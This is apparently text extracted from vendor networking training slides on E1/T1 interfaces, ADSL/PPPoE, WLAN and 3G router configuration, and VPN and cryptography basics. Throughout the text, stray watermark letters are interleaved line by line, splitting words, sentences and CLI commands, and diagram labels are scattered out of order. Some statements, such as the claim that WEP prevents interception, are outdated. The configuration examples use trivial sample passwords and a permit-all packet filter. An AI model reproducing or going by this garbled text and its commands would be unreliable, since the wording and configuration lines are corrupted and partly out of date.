t
t
h
The E1/T1 interface uses the time-division
multiplexing (TDM) mechanism.
:
s application modes: unchannelization
The E1/T1 interface supports various
e
c
r
(supported only by the E1uinterface), channelization, partial channelization,
o
s
and PRI.
Re
The E1/T1 interface
g supports the following physical features: clock,
n
i format, frame synchronization, idle code, inter-frame filling,
encoding, frame
n
r
a
and loopback.
Le
r
Pa ge 14
Copyrig
o
n
e
/
m
o
TDM Mechanism of the E1 Interface
c
.
i
e
w
a
u
In the E1 system, the frequency of the frame synchronization
h
.
g
signal is 8 KHz. That is, there are 8000 duplicated
n frames in
i
n = 125 s. The
r
each second. The sampling interval is 1s/8000
a
e
l timeslot contains eight
125 s is divided to 32 timeslots. Each
/
/
:
p x 32 x 8 = 2,048,000 bit/s.
bits. The E1 interface rate is 8000
t
t
h
The following figure shows the basic PCM frame structure of
:
s
e
the E1 interface.
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 15
Copyrig
o
n
e
/
m
o
c
E1 Related Concepts
Standard
TDM
TS
TS0
n
r
a
TS16
e
r
o
Le
.
i
e
w
a
u except the
The E1 standard is an Europe standard used in the countries
h
USA, Canada, and Japan. The E1 rate is 2.048 Mbit/s.
. The T1 standard is
g
used the US, Canada, and Japan. The E1 interface
uses the PCM
n
i
mechanism.
n
The E1 interface uses the TDM mechanism r
(the sampling interval is 125
a timeslots, numbered
s). The E1 interface is divided to 32 equivalent
e
lbits. The E1 interface has 256 bits.
from 0 to 31. Each timeslot has eight
/
/second. Therefore, the E1 rate is
8000 frames are transmitted every
:
p
2.048 Mbit/s.
t
TS is short for timeslot. A TS
t contains eight bits. A frame contains 32
h
TSs. A multiframe (MF) contains 16 frames.
:
s
e
c
rtransmit the frame alignment signals (FASs), cyclic
TS0 is used to
u
ocheck 4 (CRC4) codes, and peer alarm indications.
redundancy
s
Re
g
n
iTS16 is used to transmit the channel associated signaling (CAS),
multiframe alignment signals, and multiframe peer alarm indications.
Pa ge 16
n
e
/
m
o
c
E1 Application Modes
.
i
e
w
a
u
h
.
g
Unframed
Mode
n
i
nChannelized
r
a
le PCM31
/
/
p:
Framed
:
s
e
c
r
t
t
h
Framed multiframe
Unchannelized
PCM30
u
o
s
The unchannelized
Re mode is also called clear channel mode.
n
The framed imultiframe
uses the TS16 as the signal channel, which
n to transmit voice data such as ISDN PRI.
is mainly r
used
e
r
o
a
e
L
Pa ge 19
E1 Typical Networking One-to-One m/en

o
c
Interconnection
.
i
e
w
E1
a
E1
u
Carrier SDH/PDH
h
1
.
g
n
i
n
r
a
e
l
/ Protocol converter
/
:
E1
p
t
Carrier SDH/PDH
2
t
h
Serial port
:
s
e
c
r
u
o
Protocol converter
s
Re Carrier SDH/PDH Protocol converter
3
g
n
i Serial port
Serial port
n
r
a
e
L
e
r
o
Pa ge 21
E1 Typical Networking One-to-Many m/en

o
c
Interconnection
.
i
e
Protocol converteraw
u
h
128K
Branch 1
.
g
Serialnport
E1 2M
i
1
Carrier SDH/PDH
n
r
a
e
Headquarters
Branch 2
l
/
512K
E1
/
:
p
t Protocol converter
t
h
:
s
2M
Branch 1
e
c
Serial port
cPOS
r
2
SDH/PDH
Carrier
u
o
155M
s
e
Headquarters R
Branch 2
2M
g
E1
n
i
n
r
a
Le
e
r
o
Pa ge 22
n
e
/
m
o
c
Configuration Methods
Enter the E1 interface view
.
i
e
w
a
u
h
.
Set the CE1 work mode.
Set the n
E1gwork mode
i
n
r
a
Configure the clock.
the clock.
Configure
e
l
Configure the line code (AMI/HDB3). //
: Configure the line code (AMI/HDB3).
p
t
Configure the frame format (CRC).t
h
:
Bind the timeslots of the channel.
s
e
c
r
u
o the corresponding serial interface
s
Configure
Re
g the link layer parameters such as PPP and HDLC
Configure
n
i
n
r Configure the network layer parameters such as IP address
a
Le and routing protocol
Logical interface
parameters
Physical interface parameters
e
r
o
Pa ge 23
n
e
/
E1/CE1 Configuration Example-CLI Mode com

.
i
e
w
a
u
Physical interface configuration: Logical interface.h
configuration:
g
n
controller e 9/0/0
interface Serial9/0/0:0
i
n ppp
r
clock master
link-protocol
a
e
code hdb3
ip address
l 100.1.1.1 255.255.255.252
/
frame-format no-crc4
# :/
p
using ce1
interface Serial9/0/0:1
t
ht link-protocol ppp
channel-set 0 timeslot-list 1-4
channel-set 1 timeslot-list 5-8s:
ip address 110.1.1.1 255.255.255.252
e
c
#
#
r
u
o
s
e
R
g
n
i
n
r
a
Le
e
r
o
Pa ge 24
n
e
/
m
o
c
Contents
.
i
e
w
a
u

h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
u
n
r
a
e
r
o
g
n
i
o
s
e
Le
Pa ge 25
n
e
/
m
o
c
xDSL Overview
Asymmetric Digital Subscriber's Line
.
i
e
w
a
u
h rate on the
In the asymmetric digital subscribers line, the data
.
g (downlink) and
channel from the service provider end to the user end
n
i
n
the data rate on the channel from the user endrto the service provider
end (uplink) are different.
ea
l
/
A telephone line can bear both voice:/services and data services
p network infrastructure, the
t
simultaneously. With the existing PSTN
t
h
asymmetric digital subscribers line uses the existing twisted-pair
s: transmission without affecting the
cables to provide high-speed edata
c modulation technology. The major
voice service through the special
r
uare as follows:
o
xDSL access technologies
s
e
R
ADSL/ADSL2/ADSL2+
g
n
i
VDSL/VDSL2
n
r
a
G.SHDSL
Le (SHDSL series)
r
Pa ge 26
Copyrig
o
ADSL Overview
n
e
/
.
i
e
m
o
c
w
a
u
The ADSL2+ technology uses the existing twisted-pair
cables
h
.
g the uplink and
to provided asymmetric transmission rates non
i
n
downlink.
r
a
e common twisted-pair
The G.SHDSL/.bis technology uses lthe

/
/
cables to provide high-speed private
line access services for
:
p
tt
users. This technology is hmainly
used for interconnection
:
between small and medium
enterprise networks, mobile
s
e group access.
c
station trunks, and ISDN
r
u
o access technology is applicable to the

The VDSL2 broadband
s
e
R
private line interconnection and private line access used in
g
n
hotel networks,
high-speed network access of net bars, video
i
n
r
conferences.
a
Le
r
Pa ge 27
Copyrig
o
n
e
/
m
o
c
ADSL2+ Model
.
i
e Internet
h
.
g
PSTN
ATU-R
w
a
u
n
i
Twisted-pair cable
n
r
a
e
l
Splitter
/
/
:
p
t
ht
Splitter
:
s
e DSL technology in which the uplink and
c
The ADSL is an asymmetric
r
u
downlink transmissionsorates are different. The uplink transmission
e
R
indicates the transmission from the user end to the central office end
g transmission indicates the transmission from the
n
and the downlink
i
n
rend to the user end.
central office
a
Le
r
Pa ge 29
Copyrig
o
n
e
/
ADSL Configuration Example 1 (CLI) om

1. Configure the dialer interface.
<USG> system-view
c
.
i
u
h
.
e
w
a
g
n
i who originates the dialing.
[USG] interface Dialer 1 # Specify the name of the remote user
n
r
[USG-Dialer1] dialer user USG # Specify the dialer bundleamode used by the dialer
e
l
interface.
/
/
[USG-Dialer1] dialer bundle 1 # Configure the dialing
: bundle group to which the dialer 1
p
interface belongs.
t
t
[USG-Dialer1] dialer-group 1 # Set the link h
layer protocol to PPP.
: the IP address through negotiation.
[USG-Dialer1] link-protocol ppp # Obtain
s
e # Obtain the DNS address through negotiation.
c
[USG-Dialer1] ip address ppp-negotiate
r
u
[USG-Dialer1] ppp ipcp dns admit-any
# Use the PAP authentication mode. The user name
o
s
and password are Abcdefgh~.
e
R
[USG-Dialer1] ppp papglocal-user Abcdefgh~ password simple Abcdefgh~ # Exit and go
n
back to the system iview.
n
r
[USG-Dialer1] quit
a
e
L
r
Pa ge 31
Copyrig
o
[USG] dialer-rule 1 ip permit # Create the dialer interface and enter the dialer view.
n
e
/
m
o
c
ADSL Configuration Example 2 (CLI)
.
i
e
w
a
u
2. Create the interface Virtual-Ethernet 1.
h
.
g
[USG] interface Virtual-Ethernet 1
n
i
n
[USG-Virtual-Ethernet1] quit
r
ea Set the PVC
3. Configure the PVC value of the interface Atm l
2/0/0.
/
encapsulation type to LLC.
/
:
p
[USG] interface Atm2/0/0
t
t
h
[USG-Atm2/0/0] PVC 8/35
:
s
[USG-Atm2/0/0-8/35] map bridgeevirtual-ethernet 1
c
r
[USG-Atm2/0/0-8/35] encapsulation
llc
u
o
s
4. Configure the PPPoE session.
e
R
[USG] interface Virtual-Ethernet
1
g
n pppoe-client dial-bundle-number 1
i
[USG-Virtual-Ethernet1]
n
r
a
e
L
r
Pa ge 33
Copyrig
o
n
e
/
m
o
c
ADSL Configuration 3 (CLI)

5. Add the Vlanif interface and Dialer interface to the trust zones.
n
i
n
[USG-Vlanif1] ip address 192.168.0.1 24

[USG] firewall zone trust
w
a
u
h
.
g
[USG] interface Vlanif 1

[USG-Vlanif1] quit
.
i
e
r
a
le
/
/
:
6. Add the Dialer 1 interface to the Untrust zone.
p
t
t
[USG] firewall zone untrust
h
[USG-zone-untrust] add interface Dialer:
s
e
7. For the USG series products, configure
the inter-zone packet filter policies to ensure
c
r the USG BSR/HSR series products, skip this step.
normal network transmission. For
u
o
[USG] policy interzone trust s
untrust inbound
e
R
[USG-policy-interzone-trust-untrust-inbound] policy 0
g
n
[USG-policy-interzone-trust-untrust-inbound-0]
action permit
i
n
r
a
e
L
r
Pa ge 34
Copyrig
o
[USG-zone-trust] add interface Vlanif 1
n
e
/
m
o
c
ADSL Configuration Example 4 (CLI)
.
i
e
w
a
8. Configure the NAT and default route.
u
h
.
[USG] nat-policy interzone trust untrust outbound
g
n
i
[USG-nat-policy-interzone-trust-untrust-outbound] n
policy 1
r
a action source-nat
e
l
/
/
policy source
:
p
192.168.0.0 0.0.0.255
t
t
h
[USG-nat-policy-interzone-trust-untrust-outbound-1] easy-ip Dialer 1
:
s
9. Configure the default route.e
c
r
u 0.0.0.0 Dialer 1
[USG] ip route-static 0.0.0.0
o
s
e
R
g
n
i
n
r
a
Le
r
Pa ge 35
Copyrig
o
m
o
c
ADSL Configuration Example (Web)
.
i
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 36
Copyrig
o
n
e
/
n
e
/
m
o
c
Contents
.
i
e
w
a
u

h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
u
n
r
a
e
r
o
g
n
i
o
s
e
Le
Pa ge 37
n
e
/
m
o
c
WLAN Overview
.
i
e
w
a
u
The Wireless Local Area Network (WLAN) is a hot technology used in the
communications industry. The WLAN system is easy to deploy and use. During the
deployment, you do not need to consider the complex cabling and migration. The
WLAN, however, is not a complete wireless system. The servers and backbone
networks are still deployed in the fixed network except that the users are movable.
h
.
g
n
i
n
r
a
e services using the WLAN
The carriers and enterprises can provide wireless LAN
l
/
solution. The services include:
/
:
The wireless LAN devices can be used to p
establish
the wireless network. The users
t
with wireless network cards can access
t the wireless network, fixed network, or
h
Internet.
: the traditional 802.3 LANs.
s
Wireless network users can access
e
c
Users can access the WLANrusing different authentication and encryption modes
u
to ensure security.
o
ssecure network access and mobile area is provided for the
e
Seamless roaming for
R
wireless networkg users.
n
The WLAN, WIFI,iand 802.11 indicate the same technology.
n
r
a
e
L
r
Pa ge 38
Copyrig
o
WLAN Security Overview
n
e
/
.
i
e
m
o
c
w
a
The wireless security performance provided by the 802.11
u protocol
h
.
can better defend against general network attacks.gA few hackers,
n
i
nTherefore, the 802.11
however, still can intrude the wireless network.
r
easensitive data. A
protocol cannot comprehensively protect l
the
/is required.
/
protocol with better security mechanism
:
p
t security feature to enhance the
t
The USG2000 system uses the WLAN
h
: WLAN security feature uses the
system security and health. s
The
e
c
WLAN-MAC to check the
r access security of the 802.11 clients.
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 39
Copyrig
o
WLAN Basic Concepts
.
i
e
m
o
c
w
a
ucalled wireless clients.
On a network, all the devices that connect to the wireless medium are
h
. 802.11 standard.
Each wireless client must install the wireless network card that supports
g
n
The wireless client is classified into AP and client.
i
n
Access point (AP)
r
a user and the LAN. Frames are
The AP functions as a bridge between the wireless network
e
l between the user end and the
converted from wired transmission to wireless transmission
/
/
LAN end. The USG2100/2200 functions as an AP.
:
p
Client
t
t
The clients include fixed devices such as h
laptops, personal digital assistants, IP phones, PCs,
or work stations that are equipped with
: the wireless network cards.
s
e
Wireless router
c
r
The wireless router indicatesuthe router that provides wireless access function, for example,
o
a router that provides L3sinterfaces
and functions as a Fat AP. All the wireless clients can
e
access the wired network,
fixed network, or Internet using the wireless routers. In this
R
document, the Fat AP and wireless router represent the same device.
g
n
USG2100/USG2200
i
n
r
a
Le
r
Pa ge 40
Copyrig
o
Wireless client (STA)
n
e
/
WLAN Basic Concepts
.
i
e
m
o
c
w
a
The open system authentication is the default authentication mechanism. It is alsouthe simplest
h is set to open system
authentication algorithm, that is, non-authenticated. When the authentication.mode
authentication, all the clients are allowed to access the WLAN.
g
n
i
Shared key authentication
n
r
The shared key authentication is mainly applicable to the pre-RSNadevice. This authentication mode is used
e is used for backward compatibility with
only when the WEP encryption is enabled. This authentication mode
l
legacy devices.
/
/
:
Wired Equivalent Privacy (WEP) encryption
p
t of the data exchanged between the authenticated
The WEP encryption is used to protect the confidentiality
t
users on the wireless LAN. The WEP encryptionhcan prevent the data from being intercepted.
:
TKIP encryption
s
ethe security of the WEP protocol on the pre-RSN devices. The security
c
The TKIP encryption is used to enhance
r than that of the WEP encryption.
of the TKIP encryption is much higher
u
so
Advanced EncryptioneStandard
(AES) encryption
R applicable to the RSNA client. The CCM and the counter mode (CTR) are used
The AES encryption is only
together to performgthe privacy check. This encryption level is the highest.
n
i
Wi-Fi Protected
n Access (WPA)
r
The WPAa
is used to ensure the security of the wireless PC network. The WPA complies with the major IEEE
e
802.11i standards. The WEP authentication and encryption features are improved in the WPA.
L
r
Pa ge 41
Copyrig
o
Open system authentication
n
e
/
n
e
/
m
o
c
WLAN Network Topology
.
i
e
w
a
u
h
.
g
Internet
n
i
n
Headquarter
Headquarter
Analogue
Analogue Phone
Phone
t
t
h
VPN
VPN
s:
ADSL
ADSL
ng
ea
PSTN
ISDN
ISDN
u
o
s Fat AP
Re
PC
PC
Printer
Printer
i
n
r
PC
PC
e
r
o
/
/
p:
e
c
r
Fax
Fax
r
a
le
Video
Video phone
phone
Laptop
Laptop
WiFi
WiFi Phone
Phone
PDA
PDA
Pa ge 42
n
e
/
m
o
WLAN Configuration Example 1 (CLI) .c
i
e
w
a
u
h
Station .
g
n
WLAN-BSS2
Ethernet1/0/0
i
n
r
a
e
Ethernet0/0/0
l
/ Station
AP
/
:
p
t
t
Networking requirements:
h
: Ethernet0/0/0 interface (added to the Untrust zone).
The AP connects to the router over the
s
e interface is 202.169.10.1/24. The IP address of the
The fixed IP address of the Ethernet0/0/0
c
rrouter is 202.169.10.2/24.
Ethernet1/0/0 interface on the
u
so are 192.168.1.2/24 and 192.168.1.3/24.
The IP addresses of theestation
R
The station connects to the AP (SRG) using the wireless network card. The SSID is WLAN100.
g
n
The authentication
i mode is set to WPA2-PSK. The CCMP encryption suite is configured. The
n
pre-sharedr
key (PSK) is abcdefgh.
a
The WLAN
Le is configured to provide wireless access for the stations.
r
Pa ge 43
Copyrig
o
n
e
/
m
o
WLAN Configuration Example 2 (CLI).c
i
e
w
Configuration procedure:
a
u
Create the Vlanif 2 interface.
h
.
g
[SRG] interface Vlanif 2
n
i
n
[SRG-Vlanif2] ip address 192.168.1.1 24
r
a
e
Configure the WLAN-BSS interface.
l
/
/
[SRG] interface wlan-bss 2
:
p
[SRG-Wlan-Bss2] port access vlan t
2t
h
Configure the services.
:
s
e
[SRG] wlan service-class 2 crypto
c
r
u
[SRG-wlan-sc-2] ssid WLAN100
o
s
[SRG-wlan-sc-2] authentication-method
wpa2-psk
Re
[SRG-wlan-sc-2]
g encryption-suite ccmp
n
i pre-shared-key pass-phrase abcdefgh
[SRG-wlan-sc-2]
n
r
a
[SRG-wlan-sc-2]
service-class enable
Le
r
Pa ge 44
Copyrig
o
m
o
c
WLAN Configuration Example 3 (CLI) .

i
e
w
a
n
e
/
u
h
.
Configure the RF interface.
g
n
ni
[SRG] interface wlan-rf 4/0/0
r
a
le
[SRG-Wlan-rf4/0/0] radio-type dot11gn
/
/
p:
[SRG-Wlan-rf4/0/0] bind service-class 2 interface wlan-bss 2
t
t
h
Configure the wireless network card for the client.
e
r
o
:
s
e
c
Ensure that the SSID,r encryption mode, and PSK of the wireless
u
o
network card are
s the same as those set on the SRG.
e
R
g
n
i
n
r
a
Le
Set the IP address of the wireless network card to 192.168.1.10/24.
Pa ge 45
n
e
/
m
o
c
Contents
.
i
e
w
a
u

h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
u
n
r
a
e
r
o
g
n
i
o
s
e
Le
Pa ge 46
n
e
/
m
o
c
.
i
e
3G Overview
w
a
u
h
.
g
What is 3G?
n
i
n
r
a
le
3G standards
/
/
p:
WCDMA
:
s
e
c
r
TD-SCDMA
CDMA200
t
t
h
u
o
s
Re
3G applications
g
n
i
n
e
r
o
r
a
e
Pa ge 47
n
e
/
m
o
c
3G Implementation Modes
.
i
e
w
a
u
The data cards determine the supported wireless interface standards. At
h
.
g
present, the USG series support three types of data cards that provide Express
interfaces, USB interfaces, and MIC card interfaces.
r
a
le
n
i
n
3G database with
Express interface
3G database with
USB interface
/
/
p:
:
s
e
c
r
3G database with
MIC interface
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 50
m
o
c
Installation of 3G Data Cards i.

e
w
a
n
e
/
u
h
LAN users can access the WAN over the uplink using
. the 3G data cards.
g
n
i
A device supports only a 3G data card at a time.
n You cannot install
r
areplacing the 3G data card,
e
multiple 3G data cards on one device. When
l
/
/ and then install the new data
you must pull out the existing data card
:
p
t
card.
ht
:
s
Ensure that the subscriber identity
module (SIM) or UMTS subscriber
e
c
r
identity module (USIM)oisu installed on the data card. Check whether the
s
e
SIM card insertion direction
is correct. The SIM is provided by the
R
g
n
carrier.
i
n
ar data card to the corresponding port of the USG2100.
Insert thee3G
L
r
Pa ge 51
Copyrig
o
3G Implementation Principles
n
e
/
m
o
c
.
i
e
w
a
The 3G functions are implemented on the following modules:
u
h
.
g
Dial control center (DCC)
r
a
le
It determines the dialing triggering mode.
n
i
n
/
/
:corresponding dialing digits.
p
It simulates the MODEM to send the
t
t
h
Data card management
:
s
ecurrent data card information, including
c
It manages and obtains the
r
u
oand status information.
the APN configuration
s
e
R
Link control
g
n
It converts rthe
ni received data to the required format to implement
a
e
data forwarding
or other functions.
L
r
Pa ge 52
Copyrig
o
MODEM simulation
n
e
/
3G Application Configuration Example-om

c
.
i
CLI Mode
e
w 1/0/0
The USG2200 connects to the enterprise internal network over the Ethernet
a
u The
interface and connects to the Internet over the USB 3G 5/0/0 interface.
h
.
configurations are as follows:
g
n
i
The IP address of the enterprise network is on the network
n segment 192.168.1.0/24.
r
a
The dialing is performed at Dialer 0 interface.
e
l by the wireless network
The IP address of the Express-3G interface is allocated
/
/
:
through negotiation.
p
t
Networking diagram of the dialing over
ht the Dialer interface
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 53
3G Typical Configuration (CLI)
n
e
/
m
o
c
.
i
e
w
a
u
China Telecom CDMA2000 (E169C)
China Unicom WCDMA (E180)
China Mobile TD-SCDMA (ET128)
firewall packet-filter default permit all

dialer-rule 1 ip permit
#
interface Dialer0
link-protocol ppp
//For the CDMA2000 network, configure the PPP
authentication information.
ppp chap user card
ppp chap password simple card
ppp ipcp dns admit-any
ip address ppp-negotiate
dialer enable-circular
dialer-group 1
//This ID is the same as the corresponding dialerrule ID.
dialer timer idle 60
dialer timer autodial 10
dialer number #777 autodial
//For the CDMA2000 network, the dialer number
is #777.
#
interface Cellular5/0/0

#
interface Dialer0
link-protocol ppp
//For the TD-SCDMA and WCDMA network, the
PPP authentication is not required.

#
interface Dialer0
link-protocol ppp
// For the TD-SCDMA and WCDMA network, the
PPP authentication is not required.
/
/
p:
n
r
a
:
s
e
c
r
t
t
h
u
o
s
//For the CDMA2000 network, no APN parameter

needs to be configured.
link-protocol ppp
dialer circular-group 0
//This SN must be the same as the corresponding
dialer interface number.
#
ip route-static 0.0.0.0 0.0.0.0 Dialer0
g
n
i
n
i
n
r
a
le

dialer-group 1
// This ID is the same as the corresponding dialerrule ID.
dialer number *99# autodial //The dialer number
for the TD-SCDMA and WCDMA networks is *99#.
#
apn UNINET
//For the WCDMA standard, it is set to UNINET.
link-protocol ppp
// This SN must be the same as the corresponding
dialer interface number.
#
Re
h
.
g

dialer-group 1
// This ID is the same as the corresponding dialerrule ID.
dialer number *99# autodial // The dialer number
for the TD-SCDMA and WCDMA networks is *99#.
#
apn CMNET
//For the TD-SCDMA standard, it is set to
CMNET.
link-protocol ppp
// This SN must be the same as the
corresponding dialer interface number.
#
Le
Public configuration: Add the interface to the trusted zone. Set the NAT policies for the private network users to access the public network. Set
the routes to access the public network.
e
r
o
Pa ge 54
3G Typical Configuration (Web)
n
e
/
w
a
u
.
i
e
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 55
m
o
c
n
e
/
m
o
c
Summary
.
i
e
w
a
u
h
.
g
Basic VLAN technologies

SA and E1 WAN interface technologiesnin
Basic ADSL technologies
r
a
le
/
/
:
p
WLAN and 3G wireless technologies
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Copyrig
o
Pa ge 56
Questions
n
e
/
.
i
e
m
o
c
w
a
What interface types do the VLAN support? Howu does each
h
.
interface process the tags?
g
n
i
n
What are the encapsulation modes of ther E1 data frames?
a
e
What are the differences between thel encapsulation modes?
/
/
: involved in the ADSL
What key deployment elements are
p
t
t
configuration?
h
:
s
What key deployment elements
are involved in the WLAN
e
c
r
configuration?
u
o
s
What key deployment
Re elements are involved in the 3G
g
configuration?
n
i
n
r
a
Le
r
Pa ge 57
Copyrig
o
n
e
/
m
o
c
Answer
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 58
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
Thank :you
//
p
www.huawei.com
t
t
:
s
e
c
r
u
o
s
n
r
a
e
r
o
Le
g
n
i
Re
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
Chapter 6 VPN Overview
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
g
n
i
Re
e
L
e
r
o
www.huawei.com
Objectives
n
e
/
.
i
e
w
a
u to:
able
.
g
n
VPN concepts
i
n
r
a
Key VPN technologies
e
l
/
/
:
Types and applications of VPNs
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 1
Copyrig
o
m
o
c
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. VPN Introduction
h
.
g
n
i
n
2. VPN Technologies
r
a
le
3. VPN Types
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 2
n
e
/
m
o
c
VPN Definition
.
i
e
w
a
u
VPN
h
.
g
A Virtual Private Network (VPN) is built by establishing private data channels
n
i
n
over a shared public network (usually the Internet) to connect networks or
r
a
e
guaranteeing a certain level of security and QoS.
l
/
/
:
Virtualization
p
t
t
h links for long-distance transmission.
Users do not need to have physical data
:
Instead, long distance data lineses
of the Internet are used to create a private
c
network.
r
u
o
s
Private Network
e
R
g
Provide secure information
transport by authenticating users, and encrypting
n
i
n unauthorized persons from reading the transmitted information.
data to prevent
r
a
e
L
r
Pa ge 3
Copyrig
o
terminals that need to access the private network, to form the private network
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. VPN Introduction
h
.
g
n
i
n
2. VPN Technologies
r
a
le
3. VPN Types
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 4
n
e
/
m
o
c
Common VPN Technologies
.
i
e
w
a
u
h
.
g
Encrypts and decrypts data on both ends of a

tunnel to create a data channel
Tunneling
n
i
n
r
a
le
Identity
authentication
Ensures the legitimacy and validity of

operators to a VPN
Data
authentication
Data can be only legitimately altered when

it is sent over the network
Encryption
/decryption
Key management
n
r
a
e
r
o
g
n
i
/
/
p:
t
t
h
:
s
Ensures that
e data can be only legitimately
c
r when it is sent over the network
captured
u
o
s
e
R The key is sent securely over an insecure

network
Le
Pa ge 5
n
e
/
m
o
c
Tunneling
.
i
e
w
a
u
h
.
g
n
i
n
Branch
r
a
le
/
/
p:
Internet
:
s
e
c
r
t
t
h
Headquarters
u
o
s
SOHO user
n
r
a
g
n
i
Re
Employee on business trip
e
r
o
Le
Pa ge 7
n
e
/
m
o
c
Cryptography
.
i
e
w
a
u
h
.
g
1.1 What is cryptography
n
i
n
r
a
le
/
/
1.2 Classification of encryption :
p
t
technologies
ht
:
s
e
c
1.3 Key managementrtechnologies
u
o
s
e
R
g
n
i
n
r
a
Le
r
Copyrig
o
Pa ge 8
n
e
/
m
o
c
Cryptography
.
i
e
Encryption: from plain text to cipher text
w
a
u
h
.
g
n
i
n
r
a
le
Plain text
/
/
p: Key
t
t
h
:
s
Ce= En (K, P)
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Re
Cipher text
Le
Pa ge 9
n
e
/
m
o
c
Cryptography
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
Integrity
Confidentiality
/
/
p:
o
s
e
Availability
n
r
a
e
r
o
g
n
i
t
t
h
Cryptography
:
s
e
c
ur
Non-repudiation
Le
Pa ge 11
n
e
/
m
o
c
Development of Cryptography
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
Scytale
Caesar
cipher
Rail fence
cipher
n
r
a
e
r
o
g
n
i
:
s
e
c
r
/
/
:
Development
of
p
t
t
technologies
hencryption
Re
u Cipher
o
s
machine
Le
Pa ge 12
n
e
/
m
o
c
Cryptography
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p
t
technologies
ht
:
s
e
c
1.3 Key management rtechnologies
u
o
s
e
R
g
n
i
n
r
a
Le
r
Copyrig
o
Pa ge 14
n
e
/
m
o
c
Key-based Classification
w
a
u
Key
Private key
Public key
h
.
g
r
a
le
n
i
n
/
/
: and decryption.
p
The same key is used for encryption
t
t
h
Asymmetric encryption
:
s
e for encryption and decryption. What
c
Two different keys are
used
r
u
o the other can decrypt. The private key is for
one key encrypts, s
only
Rewhile the public key is used by users in the same
data protection,
ng the validity and identity of the information and
system to icheck
n
sender.ar
Le
r
Pa ge 15
Copyrig
o
Symmetric encryption
.
i
e
n
e
/
m
o
Symmetric Encryption Algorithms.c
i
e
w
a
u
h
.
g
Shared key
Shared key
Key = 1010110101 in
n
r
a
e
l
/
/
:
p
t
ht
:
abcdef
abcdef
s
e
E
*$@g)(!34*^hcftibf
c
D
r
u
o
Encryptions
Decryption
e
algorithm
algorithm
R
g
n
Receiver
i
Sender
n
r
a
Le
r
Pa ge 17
Copyrig
o
n
e
/
m
o
c
Common Symmetric Encryption Algorithms
.
i
e
w
a
u
h
Flow encryption
.
g
n
i
RC4
n
r
a
e
l
Block encryption
/
/
:
p
DES
t
ht
:
3DES
s
e
c
r
AES
u
o
s
IDEA
Re
g
n
RC2, RC5, i
and RC6
n
r
a
Le
r
Pa ge 18
Copyrig
o
Plain text
round 1
Key flow
Plain text
Cipher text
round N
Cipher text
n
e
/
m
o
c
Asymmetric Encryption Algorithms
.
i
e
w
a
u
h
.
Search the
g
n key = 1010110101
public key
i
Private
Public key = 1111010101
n
database
r
a
Senders public key
Receivers private key
e
l
/
/
:
p
t
t
h
:
s
e
c
abcdef
abcdef
r
u
E
D
o&^(#!b&%2(#c7(*@!Cs
s
e
R
Encryption
Decryption
g
algorithm
algorithm
n
i
n
Receiver
r
a
Sender
e
L
r
Pa ge 21
Copyrig
o
n
e
/
m
Comparison Between Symmetric and
o
c
.
i
Asymmetric Algorithms
e
w
a
u
Symmetric key algorithm
h
.
g
Advantage: Fast encryption/decryption in
n
r
a
Disadvantage: Transmission of keys
e
l
/
/
:
Asymmetric key algorithm
p
t
t
h
Advantage: High security of keys
:
s
e
c
Disadvantage: Encryption/decryption
is sensitive to speed
r
u
o
s
e
R
g
n
i
n
r
a
Le
e
r
o
Pa ge 23
n
e
/
m
o
c
Key Exchange
.
i
e
w
a
u
h
.
g
Session key
n
i
n
r
a
le
Cipher text
Plain text
Encryption
Huawei
Symantec
/tr09
/
vi16vsk
:
p
tr09
vi16vsk
t
t
h
Plain text
Decryption4
Huawei
Symantec
Transmission
:
s
e
c
r
Receivers public key

Session key
Encryption
2
e
r
o
n
r
a
g
n
i
u
o
s
Re
Receivers private key

Session key
Decryption
3
Sender
e
Receiver
Pa ge 24
Hash Algorithm
n
e
/
.
i
e
m
o
c
w
a
u changed
Hash algorithm: Inputted data of any lengthhis
.
g
n
to output data of fixed length.
i
n
r
a
h = H (M)
e
l
/
/
:
Common hash algorithms
p
t
ht
MD5
:
s
e
SHA-1
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 25
Copyrig
o
n
e
/
m
o
c
Digital Signature
Receiver
aw
Sender
Huawei
Symantec
gSame
n
ni
7
Plain text
tr09
vi16vsk
Senders
private key
r
a
le
/
/
p:
Summary
2
PGGjx
&%9$
g
n
i
Digital
signature
n
r
a
e
r
o
u
h
.
Hash function
Le
.
i
e
t
t
h
tr09
vi16vsk
Plain text
New
summary
Hash
algorithm
PGGjx
&%9$
Huawei
Symantec
Digital
signature
Plain text
tr09
vi16vsk
: Senders public key4

s
e
c
r
u
o
Huawei
s
e
Symantec
R
1. Not altered
2. Sent by the sender
Pa ge 27
n
e
/
m
o
c
Digital Certificates
.
i
e
w
a
u
Bearer of the public key
